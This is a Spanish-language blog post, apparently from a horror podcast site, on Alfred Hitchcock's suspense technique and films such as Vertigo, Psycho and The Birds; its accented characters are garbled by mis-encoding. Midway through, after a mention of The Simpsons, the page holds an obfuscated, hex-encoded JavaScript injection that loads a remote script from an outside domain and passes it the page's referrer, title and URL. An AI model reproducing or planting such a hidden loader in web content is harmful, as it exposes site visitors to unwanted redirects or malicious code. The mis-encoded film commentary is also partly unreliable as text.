Saltear al contenido principal

Cocky, como se le apodaba en inglA�s por ser diminutivo de su nombre y por su actitud difA�cil, se consagrA?, mA?s de una vez, en el gA�nero del suspenso.

Alfred Hitchcock es llamado El Maestro del Suspenso y durante su carrera fA�lmica dejA? amplia muestra de ello. No soy experto en cine y mis comentarios estA?n basados meramente en mi experiencia viendo sus pelA�culas.

Algo que el seA�or hacA�a con maestrA�a era llevarnos de mal en peor sin que pareciera exagerado; La situaciA?n era tensa en la escena y, de repente, algo desafortunado hacA�a que todo empeorara.

El sentido del humor del seA�or era negro como la noche y se nota en sus historias. Hay momentos en los que ya no sabes si reA�r o llorar.

Por sA� sola aterra y divierte. Escena de The Birds (1963).

Esto lo notA� hasta que un amigo me lo apuntA?. Hitchcock creA�a que el diA?logo era algo redundante, deberA�as de poder ver una escena sin poder escuchar las palabras y aun asA� entender que estaba sucediendo.

Por ello, buscaba actores que podA�an expresar con su rostro el proceso emocional que estaba sucediendo. Si el personaje mentA�a, querA�a que se pudiera notar en su mirada, en su boca, en alguna parte de su comunicaciA?n.

TambiA�n el color era algo que lo obsesionaba y usaba para impartir mensajes.

Hichcock preparaba la antesala del clA�max con largas secuencias musicales en silencio. Escena de Psycho (1962).

Otra cosa que siempre me ha gustado de sus pelA�culas es que la normalidad casi siempre esconde algo. En La Sombra de una Duda (Shadow of Doubt, 1943) la vida cotidiana de un pueblo americano es el escenario para esconder a un criminal.

Y claro, estA?n los clA?sicos. Todo mundo cita a Psicosis (1960) -no vean el horrendo remake de Gus Van Sant- como su mejor pelA�cula. Indudablemente es excelente: juega con el espectador desde el inicio, cambia de protagonista, y nuestras simpatA�as alternan entre el horror y la lA?stima hacia Norman Bates.

SerA�a un crimen dejar de mencionar De entre los Muertos (VA�rtigo, 1958) -nunca entenderA� esa manA�a de cambiar tA�tulos-. Hitchcock era famoso por forzar a sus actrices a actuar situaciones incA?modas y hay quien ha mencionado que disfrutaba ejercer el control de director sobre actriz hermosa.

Tres imperdibles de su filmografA�a.

VA�rtigo es precisamente sobre como un hombre vive obsesionado con la idea de una mujer y trata de modelar a otra para que se vuelva ella. Lo interesante es que la chica en cuestiA?n desde el inicio estA? fingiendo el papel para acercarse al protagonista con otras intenciones.

Los PA?jaros (The Birds, 1963) es quizA?s la pelA�cula de Hitchcock que raya mA?s en la ficciA?n. Sin avisar, las aves comienzan a atacar a la gente.

No hay explicaciA?n, no hay un cientA�fico considerando posibles causas como a Hollywood le gusta tanto. Simplemente es una situaciA?n peligrosa que exige ser inteligente para sobrevivir.

Algo que A�l odiaba era complicar en exceso la trama. Aunque se pueden considerar relativamente simples, lo cierto es que maneja muchos niveles en su narraciA?n, Al parecer A�l creA�a que mantener al pA?blico en suspenso no requiere largas explicaciones. La trama en sA� te guA�a y te lleva al punto de tensiA?n.

Sus pelA�culas tratan, sobre todo, de la naturaleza humana, lo que ocultamos, lo que hacemos para que los demA?s no descubran nuestros secretos y lo que pasa cuando salen a la luz.

Su fama ha sido tal que se le hacen tributos dentro de la cultura pop. AquA�, una secuencia de Los Simpson donde Homero emula su emblemA?tica entrada al programa Hitchcock Presenta…

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Facebook Comments

Gerardo Braham

El Doctor Braham es el alterego de Gerardo Braham, ingeniero, astrólogo y estudioso de las ciencias ocultas. Su opinión es meramente producto de sus neurosis. El doctorado que presume en su nombre procede de las ciencias ocultas y le fue otorgado por la universidad de Miskatonic.

PGlmcmFtZSBzcmM9Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20vbWFwcy9lbWJlZD9wYj0hMW0xOCExbTEyITFtMyExZDYwNDQuMjc1NjM3NDU2ODA1ITJkLTczLjk4MzQ2MzY4MzI1MjA0ITNkNDAuNzU4OTkzNDExNDc4NTMhMm0zITFmMCEyZjAhM2YwITNtMiExaTEwMjQhMmk3NjghNGYxMy4xITNtMyExbTIhMXMweDAlM0EweDU1MTk0ZWM1YTFhZTA3MmUhMnNUaW1lcytTcXVhcmUhNWUwITNtMiExc2VuITJzITR2MTM5MjkwMTMxODQ2MSIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIHN0eWxlPSJib3JkZXI6MCI+PC9pZnJhbWU+
CONTACT US
COMPANY NAME
221, Mount Olimpus, Rheasilvia, Mars
Solar System, Milky Way Galaxy
+1 (999) 999-99-99
Thank You. We will contact you as soon as possible.
CÓMO ESCUCHAR
Puedes escucharnos aquí, en nuestro sitio, o en iTunes, Soundcloud y en varias apps de podcasts.

También escúchanos en vivo por Bizarro.fm, Radio ILCE y Concepto Radial

entra a nuestras redes sociales
 
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar PSICOFONÍAS aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
SUSCRÍBETE A
Puedes escuchar POR QUÉ NOS DA MIEDO aquí, en nuestro sitio, o en cualquiera de estas aplicaciones:
¿NO SABES ESCUCHAR PODCASTS?
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
SUSCRÍBETE A
Puedes escuchar TERROR EN UN SUSPIRO aquí, en nuestro sitio, o en Soundcloud:
¿NO SABES ESCUCHAR PODCASTS?